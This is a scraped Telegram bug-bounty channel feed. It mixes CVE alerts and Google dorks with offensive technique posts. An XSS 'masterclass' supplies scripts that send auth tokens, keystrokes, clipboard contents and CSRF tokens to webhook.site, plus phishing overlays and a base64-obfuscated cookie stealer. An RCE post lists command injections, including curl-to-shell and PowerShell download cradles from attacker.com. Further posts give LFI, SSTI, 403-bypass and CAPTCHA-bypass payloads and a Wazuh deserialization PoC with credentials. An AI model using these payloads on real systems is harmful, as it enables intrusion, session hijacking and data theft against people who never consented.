CyberSec Playground | Learn ethical hacking ⚡️
743 subscribers
73 photos
1 video
2 files
188 links
Welcome to CyberSec Playground! A community to learn, explore, and master penetration testing and bug bounty, ethical hacking, and all things cybersecurity.
Backup : https://t.me/fatherofbits
cybersecplayground.com
#BugBounty #Hacking
Download Telegram
CyberSec Playground | Learn ethical hacking ⚡️
🚀 Google Dorks for Bug Bounty & Web Security! 🔍 A powerful list of Google Dorks to uncover hidden files, API endpoints, server errors, and more for pentesting & bug bounty hunting! 🎯 🔗 Live Tool for Google Dorks 🔥 Broad Domain Search (Exclude Common Subdomains)…
🚀 🚀 Google Dorks for Bug Bounty & Web Security! Part 2 : Find Vulnerable Parameters Using Google Dorks!

Google Dorks help bug bounty hunters & pentesters quickly locate vulnerable endpoints by searching for specific query parameters used in web applications. 🔍💻

🔹 XSS Prone Parameters

Look for user input fields vulnerable to Cross-Site Scripting (XSS):
inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:& site:example.com


🔥 Test with payloads like:
"><script>alert(1)</script>


🔹 Open Redirect Prone Parameters

Attackers can redirect users to malicious sites using these
parameters:
inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:example.com


🚨 Test by injecting:
?redirect=https://evil.com



🔹 SQL Injection (SQLi) Prone Parameters

Websites often use these parameters for database queries, making them targets for SQL Injection:
inurl:id= | inurl:pid= | inurl:category= | inurl:cat= | inurl:action= | inurl:sid= | inurl:dir= inurl:& site:example.com


💥 Test with:
' OR 1=1--


🔹 Server-Side Request Forgery (SSRF) Prone Parameters

These parameters can allow attackers to interact with internal services:
inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain= | inurl:page= inurl:& site:example.com


🌍 Test by sending requests to:
?url=http://internal-server.local


🔹 Local File Inclusion (LFI) Prone Parameters

LFI can be used to read system files or execute malicious scripts:
inurl:include | inurl:dir | inurl:detail= | inurl:file= | inurl:folder= | inurl:inc= | inurl:locate= | inurl:doc= | inurl:conf= inurl:& site:example.com



⚠️ Test with:
?file=../../../../etc/passwd



🔹 Remote Code Execution (RCE) Prone Parameters

These parameters might allow command execution on the target server:
inurl:cmd | inurl:exec= | inurl:query= | inurl:code= | inurl:do= | inurl:run= | inurl:read= | inurl:ping= inurl:& site:example.com


💣 Test with:
?cmd=whoami


💡 Google Dorking is a powerful OSINT technique! But always use it ethically and responsibly! 🚀

🔍 Join @CyberSecPlayground for more hacking tips, bug bounty techniques, and private tools!

📢 #BugBounty #GoogleDorks #CyberSecurity #OSINT #Pentesting #CyberSecPlayground
🔥3💊3👍1
⚠️ CVE-2025-2825: CrushFTP Authentication Bypass ⚠️

🚨 Vulnerability: Authentication bypass in CrushFTP
📌 Risk Level: Critical
📊 Affected Instances: 234K+ results found on FOFA

🔎 Technical Analysis & PoC:
🔥 Deep Dive: ProjectDiscovery Blog
📜 PoC & Exploit: GitHub PoC
🔖 Exploit & Nuclei Template: SecurityOnline

🔗 Search Queries for Detection:
FOFA Query: app="CrushFTP"
FOFA Results: View Here

🛡 Mitigation Steps:
Update to the latest secured version of CrushFTP
Restrict access to admin panels
Monitor for unusual login attempts

🔗 Stay ahead in cybersecurity: @cybersecplayground

#OSINT #FOFA #CyberSecurity #BugBounty #CVE #EthicalHacking
🔥5💊1
🚨 0-Day XSS Vulnerability Discovered using xss0r Payload! 🚨

🔥 A critical Reflected XSS vulnerability has been uncovered across multiple domains in a Private Bug Bounty Program, leading to Account Takeover (ATO) risks!

💥 Payload:

orwa%27"><svg/onload=alert(document.cookie)>


This 0-Day XSS exploit demonstrates how improperly sanitized input can be weaponized to steal session cookies and compromise user accounts. 🚨

🔎 Why is this Important?

XSS vulnerabilities remain one of the most dangerous and common web security flaws. Attackers can use XSS to:
Hijack user sessions
Deface websites
Inject malicious scripts
Bypass security mechanisms

📢 Want more bug bounty techniques & private security tools?
Join @CyberSecPlayground for exclusive insights & daily hacking tips!

#BugBounty #XSS #Exploit #WebSecurity #CyberSec #Hacking #EthicalHacking #CyberSecPlayground 🚀
32💊1
🚨 Critical 0-Day Alert: CVE-2025-2005 (CVSS 10) – WordPress Plugin File Upload Vulnerability!

A Critical RCE vulnerability has been discovered in the Front End Users Plugin for WordPress, affecting versions ≤ 3.2.32. This flaw allows unauthenticated attackers to upload arbitrary files, potentially leading to remote code execution on the server!



⚠️ Vulnerability Details:
Plugin: Front End Only Users
Version Affected: ≤ 3.2.32
Impact: Unauthenticated File Upload → Full Server Takeover
CVSS Score: 10.0 (Critical)



🔥 Proof of Concept:

PoC available here:
github.com/Nxploited/CVE-…



FOFA Dork:

body="/wp-content/plugins/front-end-only-users/"



Recommendation:
• Update the plugin immediately or remove it if not in use
• Monitor for suspicious uploads and unexpected PHP files
• Harden server file permissions and enable WAF rules



Stay ahead of zero-days with us!
Join @CyberSecPlayground for exclusive vulnerability alerts, private tools, and real-time bug bounty tips.


#CVE2025_2005 #WordPress #Exploit #0day #CyberSecurity #FOFA #OSINT #BugBounty #CyberSecPlayground
4
💡 Bug Bounty Tip: Unlock Hidden Gold in JavaScript!

Found an interesting JS file? Don’t stop there.

Always check for archived versions using tools like:

Wayback Machine
• waybackurls
• gau (getallurls)

Why? Because older JS files might still reveal:

🔍 Legacy API Endpoints – Some still live and exploitable!

🔐 Hard-Coded Secrets – Tokens, keys, creds (yes, even now)

📥 Input Parameters – Useful for fuzzing and recon

Pro Hackers dig deeper – do you?



For more daily tips, 0-day POCs, private tools & hacker techniques:
Join @CyberSecPlayground – We drop only the good stuff.

#BugBountyTips #JavaScriptHacking #WaybackRecon #WebSecurity #CyberSecurity #HackWithIntigriti #CyberSecPlayground #EthicalHacking #RedTeam
4👍1
⚠️ CVE-2025-2945 — Remote Code Execution in pgAdmin 4 ⚠️

A critical RCE vulnerability has been discovered in pgAdmin 4, putting thousands of systems at risk!

Details:
Type: Remote Code Execution (RCE)
CVSS: 9.8 (Critical)
Impact: Full system compromise, sensitive data exposure

🔥 PoC And more detail:
https://py0zz1.tistory.com

🎯 FOFA Stats:
Over 41,000 exposed results found via FOFA!

🕵️‍♂️ FOFA Dork:
body="pg-sp-content" && title="pgAdmin 4"


🔗 FOFA Link:
https://en.fofa.info/result?qbase64...

Mitigation:
Update pgAdmin ASAP or restrict public access!

🔥 As a result, an attacker can execute arbitrary Python code by sending a crafted POST request to the vulnerable endpoint.



Follow CyberSec Playground for more 0-day alerts, hacking tips & bug bounty tricks!
@cybersecplayground

#CyberSecurity #CVE2025 #pgAdmin #RCE #BugBounty #InfoSec #FOFA #CyberSecPlayground
🔥5
🔥 Bug Bounty Goldmine: CORS Misconfiguration Exploitation

What is CORS?
Cross-Origin Resource Sharing (CORS) is a security feature implemented by browsers to prevent unauthorized domains from making requests to your app’s backend.

But what if it’s misconfigured?
You might be able to steal user data, bypass security controls, and even hijack sessions!


⚠️ Risks of CORS Misconfigurations:

🚨 Steal sensitive user data from authenticated sessions
🚨 Hijack API requests using malicious domains
🚨 Full Account Takeover if credentials: true is enabled

🛠️ How to Test for CORS Vulnerabilities:

1️⃣ Send malicious requests with a custom Origin

Try:
Origin: https://evil.com


2️⃣ Check server response for this header:
Access-Control-Allow-Origin: *


3️⃣ If you find:
Access-Control-Allow-Credentials: true


along with a wildcard origin — that’s a BIG problem.

4️⃣ Try this in browser console:
fetch("https://target.com/api/user", {
credentials: "include"
});


If you get a valid response: CORS is vulnerable!



💡 Pro Tip:
Use tools like Corsy, DalFox, or Burp Suite CORS plugins for faster detection and testing.



Follow CyberSec Playground for daily bug bounty gems, exploits, PoCs, and hacking tips:
@cybersecplayground

#CyberSecurity #CORS #BugBountyTips #HackerMindset #InfoSec
💊6
🚨 Bug Bounty Tip: Watch Out for SSTI (Server-Side Template Injection)!

SSTI vulnerabilities can lead to Remote Code Execution (RCE) when input is unsafely rendered by template engines. These bugs are often overlooked but extremely powerful in real-world exploits!

How to Detect SSTI?

🔍 Test with these payloads:

{{7*7}}      → Jinja2
${7*7} → Freemarker
<%= 7*7 %> → Velocity, EJS


If the result returns 49, you might have SSTI!

Frameworks to look for:
• Jinja2 (Python Flask/Django)
• Twig (PHP)
• Freemarker (Java)
• Velocity (Java)
• EJS (Node.js)

Escalate to RCE (if exploitable):

{{ self._Template__module.__builtins__.os.popen('id').read() }}


This can leak system-level information or execute commands if not sandboxed.

Pro Tip: SSTI is commonly found in contact forms, error pages, and search functionalities where server-side rendering is used.

Stay sharp — SSTI might be hiding where you least expect it!

#BugBounty #WebSecurity #SSTI #RCE #CyberSecurity #EthicalHacking
Follow @CyberSecPlayground for more expert tips!
🔥42💊1
🚨 Tool Spotlight: WhatsAppHacking by Hack-BitGod

A powerful tool designed to test WhatsApp vulnerabilities by crashing the app and injecting payloads to extract media files — strictly for educational and authorized testing only!

Features:
• Crash WhatsApp using specially crafted messages
• Inject payloads to access media files on the target device
• Supports automation via shell scripting

Usage Disclaimer:
This tool is for educational and research purposes only. Unauthorized access or misuse may violate privacy laws and ethical standards. Always test in a legal and responsible environment with proper permission.

Installation & Usage:

Full installation steps and usage guide available on GitHub:

GitHub Repository



Stay safe, stay ethical, and happy hacking!

#WhatsAppHacking #BugBounty #CyberSecurity #InfoSec #EthicalHacking #TelegramTools #HackBitGod #OpenSource
5💊2
🚨 Alert: CVE-2024-48887 — Fortinet FortiSwitch Critical Vulnerability 🚨

A password change vulnerability in the FortiSwitch GUI allows unauthorized modifications without verification.

🔓 This opens the door for attackers to take over admin accounts and gain full control over network switches!

📊 Affected Devices: Over 2.7K+ services are exposed on the internet yearly.

🔍 Hunter Link

📌 OSINT Queries:

Hunter: product.name="FortiSwitch"
FOFA: app="FortiSwitch"
Shodan: http.title:"FortiSwitch"

📰 References:
Fortinet Advisory
Security Online Report

💡 Mitigation:
Update FortiSwitch firmware immediately and restrict GUI access to trusted IPs.

🔐 Stay sharp and stay updated with @cybersecplayground

#Fortinet #FortiSwitch #infosec #OSINT #CVE #hunterhow #cybersecurity #Vulnerability #BugBounty #InfoSecurity #ZeroDay
🔥4💊1
🔥 Masterclass XSS Exploits — Go Beyond Cookies
#XSS #BugBounty #WebSecurity #CyberSec #cybersecplayground

Most beginners stop at alert(document.cookie)…
But real hunters go further! Here’s your XSS Power Checklist to escalate from a basic alert to full-blown pwnage:

1. Steal Tokens from localStorage / sessionStorage
Modern apps store JWTs or auth tokens in local/session storage—not cookies. If accessible, that’s a goldmine!
<script>
fetch("https://webhook.site/YOUR-ID?ls=" + localStorage.getItem("authToken"))
</script>


Try different key names like:
access_token, jwt, session_id, refreshToken

2. Fake UI / DOM Hijacking for Phishing
Trick users into interacting with fake forms or buttons. This works even if the page looks legit.
<script>
document.body.innerHTML = `
<h2>Session Expired</h2>
<form action="https://attacker.com"><input name="user" value="grabbed"></form>`;
</script>


Bonus: Full-screen phishing via iframe
<iframe src="https://evil.com/login.html" width="100%" height="100%"></iframe>


3. Keylogger Injection
Monitor what the victim types—great for grabbing usernames, passwords, or search terms:
<script>
document.onkeypress = e => {
fetch('https://webhook.site/YOUR-ID?key=' + e.key);
}
</script>


4. Session Riding via Authenticated Requests
Even if you can’t steal cookies, you can abuse the victim’s session silently:
<script>
fetch("/api/delete-account", {
method: "POST",
credentials: "include"
});
</script>


Use for: account deletion, setting changes, sending messages, etc.


5. Clipboard Access (Yes, You Can)
Try stealing copied data—passwords, credit card numbers, copied API keys…
<script>
navigator.clipboard.readText().then(text => {
fetch('https://webhook.site/YOUR-ID?clip=' + encodeURIComponent(text));
});
</script>

Note: May require user interaction.

6. Exfiltrate CSRF Tokens from the DOM
Sometimes CSRF tokens are hidden in forms or meta tags.
<script>
fetch("https://webhook.site/YOUR-ID?csrf=" + document.querySelector('[name=csrf_token]').value);
</script>


7. JavaScript Prototype Pollution
Modify base JS objects. This can break site functionality or even open up logic flaws:
<script>
Object.prototype.pwned = true;
</script>

Useful to combine with other bugs like logic bypasses.


Bonus: Obfuscation for WAF Evasion
Encode your payloads to sneak past filters:
<script>
eval(atob('ZmV0Y2goJ2h0dHBzOi8vd2ViaG9vay5zaXRlL3lvdXItaWQ/bD0nICsgZG9jdW1lbnQuY29va2llKTs='))
</script>


This decodes and runs the actual malicious JS.



TL;DR - Don’t Stop at Cookies. Explore:
• Tokens in JS Storage
• DOM Manipulation
• Phishing via UI
• Silent session abuse
• Clipboard & CSRF grabs
• Prototype hijacks
• Obfuscated bypasses

Follow @cybersecplayground for real-world hacking techniques, 0-days, tools, and advanced bug bounty content—daily!

#InfoSec #RedTeam #WebAppHacking #EthicalHacking #TelegramCyberSecurity
🔥41
🔍 Business Logic Bug: Username Reuse after Account Deletion

This bug may seem minor — but in the right scenario, it can be exploited in serious ways 👇

🧪 Exploitation Steps:
1️⃣ Register a new account (e.g., username: john_doe)
2️⃣ Verify and activate it (complete onboarding)
3️⃣ Delete the account via user settings or API
4️⃣ Try registering again using the same username

💣 What’s the bug?
If the app blocks the reused username, it may be improperly reserving deleted identifiers. This creates a logic flaw — deleted usernames should either be released, or the system must have a clear reason (e.g., reserved for legal/account recovery).


⚠️ Real-World Risks:
🔹 Denial of service to username reclaims
🔹 Reputation hijacking (e.g., attacker registers a deleted org/brand username)
🔹 Username sniping or holding can become an attack vector
🔹 Inconsistent user lifecycle policies across platforms

🧠 Bonus Testing Tips:

⚡️Check the app's ToS or documentation for username policy
⚡️Try same steps with email addresses or phone numbers
⚡️Use Burp Suite or Postman to inspect backend validation logic
⚡️Look for orphaned records in forgotten endpoints (e.g., profiles still resolving after deletion)

Report it as a Business Logic Issue / Account Lifecycle Flaw
CWE: CWE-640 – Weak username management / Improper authorization

#bugbountytips #infosec #bugbounty #websecurity #cybersecurity #ethicalhacking

🔐 Stay ahead with daily CVEs, PoCs & hunting tricks
👉 Join @cybersecplayground for more 👾
🔥5👍1💊1
🛡 Bypass 403 & 401 HTTP Status Codes:
A Practical Guide for Hackers & Bug Bounty Hunters
403 Forbidden or 401 Unauthorized doesn’t always mean you're blocked permanently. With a bit of creativity and the right techniques, you can bypass restricted endpoints and access sensitive areas of a web app.


Here’s a deep dive into the top methods:

🔓 1. Header Injection Tricks
Many web applications restrict access based on IP addresses. You can spoof these headers to make it look like your request is coming from an internal or whitelisted IP:
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Client-IP: 127.0.0.1


👉 These headers are often trusted by reverse proxies or poorly configured servers.

🌐 2. Unicode/Encoding Tricks
Sometimes filters block specific paths like /admin, but bypass is possible with obfuscated or encoded strings:
/adm%69n (URL-encoded 'i')
/admi%6E/
/admīn/ (using Unicode characters)


🧠 Try mixing encodings or using UTF-8 homoglyphs to evade naive filters.

🪄 3. URL Override with Custom Headers
If the app is behind a proxy (like Apache, NGINX), some headers might let you rewrite the path:
X-Original-URL: /admin
X-Rewrite-URL: /admin
X-Override-URL: /admin


Sometimes reverse proxies honor these headers and forward the modified path.

💣 4. Smart Payloads
Bypass 403 with URL tricks:
/admin/
/./admin/
/..;/admin/
/admin/.
/%2e/admin
/accessible/../admin


🔍 These payloads rely on path traversal, URL normalization, or unexpected token parsing by the server.

🔁 5. HTTP Method Toggling
If GET is blocked, try:
POST /admin
OPTIONS /admin
HEAD /admin


📌 Some endpoints allow different behavior based on the HTTP method. Always test all verbs.

🌐 6. Use IP or VHost Directly
Apps may have different behavior based on the host header or internal IP:
http://127.0.0.1/admin
Host: internal.target.com


🧠 Useful in SSRF or when attacking services via VPN/intranet/internal redirections.

🔍 7. Fuzzing & Bruteforce
When all else fails, fuzz it:
Tools like ffuf, dirsearch, feroxbuster, or gobuster
Try common bypass payloads, path variants, file extensions
Combine with wordlists like SecLists, PayloadAllTheThings, or custom bypass lists.

🧠 Knowledge = Power. Combine these tricks to chain attacks or bypass WAFs & ACLs.

#bugbountytips #403bypass #ethicalhacking #infosec #penetrationtesting #cybersecurity
❤️ Like + 🔁 share if this helped you or saved you hours of fuzzing!

📡 More content at @cybersecplayground
🔥5💊3
🧠 How to Bypass CAPTCHAs in Bug Bounty & Pentesting
CAPTCHAs are meant to block bots — but they’re often poorly implemented. Bypassing them can unlock critical attack vectors like account bruteforce, IDORs, or automated actions.


Here's how to approach CAPTCHA bypass step-by-step:

🔎 1. Client-Side Only CAPTCHAs

Some CAPTCHAs exist only in the frontend, without server-side validation.

Trick:

Intercept the request using Burp.

⚠️ Delete the CAPTCHA response/token.
If the request still goes through = CAPTCHA not validated, you can automate everything freely.

🧩 2. CAPTCHA Reuse Across Sessions

Tokens should be one-time-use, but sometimes they're reusable across different accounts or sessions.

Trick:

Solve CAPTCHA once, save token.

⚠️Use the same token in multiple POST requests.
If it works = Reused token, now you can bruteforce or automate requests.

🔄 3. Solve Once, Automate After

Some apps only show CAPTCHA on the first few tries, then disable it (bad rate-limiting logic).

Trick:

⚠️Try several login attempts manually.
If CAPTCHA disappears, automate everything after that point.

🚧 4. CAPTCHA on Frontend, Not on API

Often the web form has CAPTCHA, but the API behind it doesn’t.

Trick:

Inspect web traffic: is form submitting to /api/login?
⚠️Try sending the same request directly to the API without CAPTCHA token.
If it works = jackpot.

🤖 5. CAPTCHA Solving Services (As Last Resort)

If you want to go full automation:

⚡️ Use tools like 2Captcha, anti-captcha.com, or CapSolver
⚡️ Automate solving via headless browser + API

Tools:
🔸 puppeteer-extra-plugin-recaptcha
🔸 selenium + 2Captcha
🔸 CapSolver Python/JS SDK

🔥 Bonus Tip: Bypass reCAPTCHA v2 Checkbox
Try sending a valid g-recaptcha-response from a publicly solved CAPTCHA (from sites that allow it). Sometimes reCAPTCHA site keys are not restricted.

👾 CAPTCHA bypass = open door to:
⚡️ Account bruteforce
⚡️ Password spraying
⚡️ Registration spam
⚡️ Automated recon (like IDOR fuzzing)

💥 Follow for more hacking blueprints and recon scripts!

📢 Join the channel: @cybersecplayground

❤️ Like & Share to spread the knowledge
#bugbounty #pentest #infosec #recon #osint #bypass #captcha #crypto #cryptotab
💊4🔥3👍1
🔍 Real-World LFI Hunting Tips (Local File Inclusion)

LFI is one of those classic bugs that keeps showing up — if you know where to look. Here’s how to hunt them based on real-world findings:


1️⃣ GET Path Injection

Try this in URL params:
example.com/page=///../../../../etc/passwd

💡 Tip: Start with triple slashes /// to bypass filters.

Use Burp Suite or ffuf to fuzz with payloads like:

../etc/passwd
....//....//etc/passwd
%2e%2e%2f%2e%2e%2fetc%2fpasswd


2️⃣ POST LFIs

Some LFI bugs hide in POST requests. Look for parameters like:
POST /router.jsp  
page=../etc/passwd

💡 Tip: Use Burp Repeater to modify POST body and test LFI payloads.

3️⃣ Hidden Params (The Real Gold)

Many LFI bugs come from undocumented or hidden parameters.

Tools to find them : ParamSpider , Arjun

JS file analysis (look for .js files that reference “file=”, “path=”, etc.)

🔓 Bypass Tricks

🌀 Encoding payloads:
%2e%2e%2f = ../
%00 null-byte (older PHP apps)
URL double encoding: %252e%252e%252f


Use these to bypass simple filters or WAFs.

⚠️ Stay Ethical

LFI can lead to:
⚡️Arbitrary file read
⚡️RCE via log injection or /proc/self/environ
⚡️Sensitive config exposure
⚠️Only test on targets you're authorized to assess!



💥 Stay sharp, automate smart, and always verify paths manually.

📢 Join us for daily hunting tricks and recon scripts → @cybersecplayground

❤️ Like & Share if you found this helpful
#bugbounty #lfi #infosec #recon #exploit #pentest #osint
🔥6💊1
🛠 LFI Bypass Techniques — From Filters to Null Bytes

LFI (Local File Inclusion) vulnerabilities can be deadly, but web apps often add filters to prevent exploitation. The good news? Most of them can be bypassed with smart tricks. Here's a full breakdown 👇

🔍 1. Non-Recursive Filters Bypass

Many devs use basic replace filters like:
str_replace('../', '', $_GET['file']);


Bypass: Use recursive variants like:
....//....//etc/passwd
..././..././etc/passwd
....\\\\....\\\\etc/passwd


🧠 These payloads escape basic filtering as they don’t get fully cleaned by single-pass filters.

🔐 2. URL Encoding Bypass
If . and / are blocked:
%2e%2e%2f = ../
%252e%252e%252f = double encoded ../


Try this:
language=%2e%2e%2f%2e%2e%2fetc%2fpasswd

🧠 Use Burp Decoder or python3 -c 'import urllib.parse; print(urllib.parse.quote("../"))'

📁 3. Whitelisted Paths (Regex)
If regex like this is used:
if(preg_match('/^\.\/languages\/.+$/', $_GET['language'])) {


Bypass by nesting:
language=./languages/../../../../etc/passwd

🧠 Start from approved path and traverse back.

🧩 4. Appended Extension Bypass

Some apps auto-append .php:
include($_GET['page'] . '.php');


Try reading .php source files (e.g., config.php) Or use Null Byte Injection on old PHP (<5.5):

/etc/passwd%00


⚠️ 5. Path Truncation (Legacy Trick)

🧠 In PHP <5.3, strings >4096 chars get truncated.
Payload:
non_existing_dir/../../../etc/passwd/././././././././.[repeat ~2048 times]


Generate:
echo -n "non_existing/../../../etc/passwd/" && for i in {1..2048}; do echo -n "./"; done


💡 Other Bypass Tips

▶️Try Null Byte %00
▶️Mix slashes: \, //, \\\\
▶️Combine encodings + recursive tricks
▶️Brute-force with tools: ffuf, Burp Intruder

🔗 Payload List : Github.com

📚 LFI bypasses are critical in bug bounty and CTFs. Know your server version, test filters carefully, and automate with payload lists.

📢 For more deep-dive recon & exploit tips, join us at → @cybersecplayground

❤️ Like & Share if you learned something new
#bugbounty #LFI #pentesting #exploit #infosec #cybersecurity
🔥5
"Which bug class should We cover next? "
Final Results
13%
XSS
19%
SSRF
39%
RCE
13%
Sqli
16%
File Upload
6
🚨 Remote Code Execution (RCE) — Payloads, Bypasses & Real-World Tips
RCE is one of the most critical vulnerabilities in web apps — allowing attackers to run arbitrary commands on the server. Here’s how to hunt it, bypass filters, and exploit it effectively.


Where to Look:

🔹 Common vulnerable parameters:

cmd=, exec=, ping=, ip=, host=
url=, path=, file=, log=

Anything passed to system functions : system(), exec(), popen(), etc.

🔹 Dangerous endpoints:
/admin, /tools/, /debug/ , /run , /test , /shell


💥 Payload Examples (Linux):
;whoami
|id
&uname -a
$(whoami)
`id`
|| ls -la
; curl attacker.com | sh


Windows Payloads:
& whoami
| powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"


🛡 Bypass Filters & WAF Tricks:

Command Obfuscation:
$(wh\oami)
`i$IFS$d`
whoami%00


Double Encoding:
%2526id
%26%26whoami


Environment Injection:
${run{whoami}}
${@system('id')}


URL Encoded Pipes:
%7C%7Cls
%26%26whoami


🧠 Advanced Tips:
🔍 Use Burp Intruder to fuzz for RCE across multiple parameters
🧬 Combine with LFI to achieve RCE via log poisoning
🔁 Test for blind RCE using out-of-band payloads (webhook.site)

;curl http://<your-server>/?x=$(whoami)


🚩 What to Report:
🔸Full command execution
🔸Blind RCE (e.g., ping or DNS callback)
🔸RCE chained with upload, LFI, or SSRF
🔸Bypasses that work on protected endpoints

🔔 Stay sharp. Test responsibly. Report ethically.

🔗 Payload List : Github.com

📡 For more payloads, recon tools, and real hunting tips, join our Telegram: 👉 @cybersecplayground

👍 Like & Share to help fellow hunters.

#bugbounty #rce #payloads #infosec #cybersecurity #ethicalhacking #hackingtips #websecurity
👍7💊1
🚨 Wazuh Remote Code Execution (CVE-2025-24016) - PoC

📌 Vulnerability Summary
A critical RCE vulnerability has been identified in the Wazuh server due to unsafe deserialization in the wazuh-manager package. This bug affects Wazuh versions ≥ 4.4.0 and has been patched in version 4.9.1.


🔍 Details
The flaw lies in the Wazuh API's DistributedAPI, where user-controlled input is unsafely deserialized. This allows attackers with API access (e.g., compromised dashboard or cluster node) to execute arbitrary Python code on the master server using the run_as endpoint.


📬 Proof of Concept (Burp Request)
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==
Content-Type: application/json

{
"__unhandled_exc__": {
"__class__": "exit",
"__args__": []
}
}

📌 The Authorization header is the base64 of wazuh-wui:MyS3cr37P450r.*- .
📌 The payload causes the Wazuh server to shut down by calling Python's exit() method.

💥 Impact
🔸Full Remote Code Execution via the API
🔸Server Shutdown in PoC (DoS)
🔸Risk of lateral movement across Wazuh clusters

🛡 Mitigation
Upgrade to Wazuh v4.9.1 or higher
🚫 Avoid exposing the API externally
🧪 Monitor unusual API activity

📚 Stay sharp, hackers! More bug bounty PoCs, bypasses, and payloads are coming!

Follow 👉 @cybersecplayground for daily hacking content!

Full Review And POC : https://github.com/cybersecplayground/CVE-2025-24016...

#bugbounty #rce #wazuh #infosec #security #pentest #zeroday #exploit
🔥4
🔍 RCE Alert – CVE-2025-30406: Gladinet CentreStack

🚨 A critical Remote Code Execution (RCE) vulnerability affects Gladinet CentreStack (also branded as Triofox), a popular file-sharing and remote access solution. This flaw allows unauthenticated attackers to execute arbitrary code on exposed systems.


📣 Exploitation Confirmed in the Wild

🛰 Recon Queries:

HUNTER: product.name="CentreStack"  
SHODAN: title:"CentreStack"


📄 Full Analysis & References

⚠️ Impact:
🔸Full RCE via unauthenticated HTTP access
🔸Used in real-world attacks (APT groups & cybercriminals)

🔒 Mitigation:
🔸Apply official patches immediately
🔸Block external access to the CentreStack interface
🔸Monitor network traffic for suspicious HTTP activity

📢 Stay ahead of critical threats! Follow us at @cybersecplayground for daily vulnerability updates, exploit PoCs, and threat intelligence.

👍 Like, Share & Forward to support the infosec community!

#hunterhow #infosec #infosecurity #OSINT #Vulnerability #CyberSecurity
🔥6